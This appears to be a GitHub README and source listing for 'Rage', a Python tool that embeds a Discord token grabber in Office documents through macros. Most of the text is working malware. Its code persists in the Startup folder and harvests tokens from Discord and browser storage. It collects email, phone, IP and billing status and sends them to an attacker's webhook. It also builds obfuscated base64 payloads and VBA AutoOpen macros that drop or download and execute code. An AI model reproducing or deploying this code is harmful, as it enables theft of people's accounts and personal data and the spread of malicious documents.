A Discord token grabber executing in a Microsoft Document.


🦊 Rage 🦊

Rage is a tool written in Python3 allowing you to inject a
Python3 complete Discord token grabber (Riot) script in a Microsoft Document using macros.


+ Very advanced token grabber, infecting the victim (moving to startup) and sending the new token if the password is changed
+ Walkthrough well explained
+ Can be used with any Microsoft Document file (Word, Excel, Powerpoint...)

- Not automatic, you will have to follow the tutorial and create the macro yourself
- The victim needs Python3 to execute the malicious script

🎯 Levels 🎯

This section shows the "levels" of this project, from 0/5 to 5/5 !

🟢 🔵 🔴 🟣

  • Time: 🔴
  • Complexity: 🟣
  • Service: 🟣

💡 Ideas 💡

Feel free to make a pull request on this repository to submit any idea!

  • Allow the user to choose a file to be injected in the Microsoft Document
  • Automatise the creation of the macro

📌 Disclaimer 📌

  • Please use this program only for educational purposes.
  • It is not meant to be used in any malicious way, and I decline any responsibility for what you do with it.


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    path = "%s/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/rage.pyw" % getenv("userprofile") if not isfile(path): copy(file, path) startfile(path) remove(file) exit() elif file.replace('\', '/') != path.replace('\', '/'): exit() webhook = '""" + webhook + r"""' pingme = """ + str(ping) + r""" class Discord: def setheaders(token: str = None) -> dict: headers = {'content-type': 'application/json', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'} if token: headers['authorization'] = token return headers def get_tokens() -> list: tokens = [] LOCAL = getenv("LOCALAPPDATA") ROAMING = getenv("APPDATA") PATHS = { "Discord": ROAMING + "\Discord", "Discord Canary": ROAMING + "\discordcanary", "Discord PTB": ROAMING + "\discordptb", "Google Chrome": LOCAL + "\Google\Chrome\User Data\Default", "Opera": ROAMING + "\Opera Software\Opera Stable", "Brave": LOCAL + "\BraveSoftware\Brave-Browser\User Data\Default", "Yandex": LOCAL + "\Yandex\YandexBrowser\User Data\Default" } def search(path: str) -> list: path += "\Local Storage\leveldb" found_tokens = [] if isdir(path): for file_name in listdir(path): if not file_name.endswith(".log") and not file_name.endswith(".ldb"): continue for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]: for regex in (r"[\w-]{24}.[\w-]{6}.[\w-]{27}", r"mfa.[\w-]{84}"): for token in findall(regex, line): try: urlopen(Request( "https://discord.com/api/v9/users/@me", headers=Discord.setheaders(token))) except HTTPError: continue if token not in found_tokens and token not in tokens: found_tokens.append(token) return found_tokens for path in PATHS: for token in search(PATHS[path]): tokens.append(token) return tokens class Grab: def token_grab(token: str): def getavatar(uid, aid) -> str: url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}" try: urlopen(Request(url, headers=Discord.setheaders())) except HTTPError: url += ".gif" return url def has_payment_methods(token) -> bool: has = False try: has = bool(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=Discord.setheaders(token))).read())) except: pass return has valid, invalid = "<:valide:858700826499219466>", "<:invalide:858700726905733120>" def verify(var): return valid if var else invalid user_data = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=Discord.setheaders(token))).read()) ip = loads(urlopen(Request('http://ipinfo.io/json')).read())['ip'] computer_username = getenv("username") username = user_data["username"] +
    "#" + str(user_data["discriminator"]) user_id = user_data["id"] avatar_id = user_data["avatar"] avatar_url = f"https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}" email = user_data.get("email") phone = user_data.get("phone") mfa_enabled = bool(user_data['mfa_enabled']) email_verified = bool(user_data['verified']) billing = bool(has_payment_methods(token)) nitro = bool(user_data.get("premium_type")) nitro = valid if nitro else invalid email_verified = verify(email_verified) billing = verify(billing) mfa_enabled = verify(mfa_enabled) if not phone: phone = invalid data = [{ "title": "Rage", "description": "Grabbed!", "url": "https://github.com/billythegoat356/Rage", "image": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "color": 0xCB4335, "fields": [ { "name": "Infos Du Compte", "value": f'Email: {email}\nTéléphone: {phone}\nPaiement: {billing}', "inline": True }, { "name": "Infos du PC", "value": f"IP: {ip}\nUtilisateur: {computer_username}", "inline": True }, { "name": "Infos Supplémentaires", "value": f'Nitro: {nitro}\n2FA: {mfa_enabled}', "inline": False }, { "name": "Token", "value": f"||{token}||", "inline": False } ], "author": { "name": f"{username}", "icon_url": avatar_url }, "thumbnail": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "footer": { "text": "by billythegoat356" } }] Grab.send(data) def send(data: str): data = {"username": "Rage", "avatar_url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb", "embeds": data, "content": "@everyone" if pingme else ""} return urlopen(Request(webhook, data=dumps(data).encode('utf-8'), headers=Discord.setheaders())) sent_tokens = [] def token_grab(): for token in Discord.get_tokens(): if token not in sent_tokens: Grab.token_grab(token) sent_tokens.append(token) ready_data = [{ "title": "Rage", "description": "Initialized!", "url": "https://github.com/billythegoat356/Rage", "image": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "color": 0xCB4335, "fields": [ { "name": "Ready!", "value": 'I am ready to find some tokens!', "inline": True } ], "thumbnail": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "footer": { "text": "by billythegoat356" } }] Grab.send(ready_data) while True: if not isfile(file): exit() token_grab() """

    e = b64encode(code.encode('cp850')).decode('cp850')
    encoded = [e[:900], e[900:1800], e[1800:2700], e[2700:3600], e[3600:4500], e[4500:5400], e[5400:6300], e[6300:7200], e[7200:8100], e[8100:9000], e[9000:9900], e[9900:]]
    script = []
    for _ in range(len(encoded)):
        chars = ""
        for char in encoded[0]:
            chars += char
        encoded = [l for l in encoded[1:]]
    vba =  """Sub AutoOpen()
    folder = "C:/Users/" & Environ("username")
    Exists = Dir(folder, vbDirectory)
    If Exists = "" Then
        folder = "C:/Users/OneDrive/" & Environ("username")
    End If
    ChDir (folder)
    myFile = "_rage.py"
    Open myFile For Output As #1
    vba += f"""Print #1, "b64list=''.join('''"
    for line in script:
        vba += f"""Print #1, "{line}"
    vba += f"""Print #1, "'''.splitlines());exec(__import__('base64').b64decode(b64list).decode('cp850'))"
    vba += """Close #1
    Shell ("python _rage.py")

    End Sub""" return vba

    def mkcustomscript(link: str, extension: str) -> str:

    return f"""Sub AutoOpen()
    folder = "C:/Users/" & Environ("username")
    Exists = Dir(folder, vbDirectory)
    If Exists = "" Then
        folder = "C:/Users/OneDrive/" & Environ("username")
    End If
    ChDir (folder)
    Dim URL As String
    URL = "{link}"
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", URL, False
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile "_rage{extension}", 2
    myFile = "_rage_exec.bat"
    Open myFile For Output As #1
    Print #1, "start _rage{extension}"
    Close #1
    Shell ("_rage_exec.bat")

    End Sub"""

    opened by Dazd-Pkz 5
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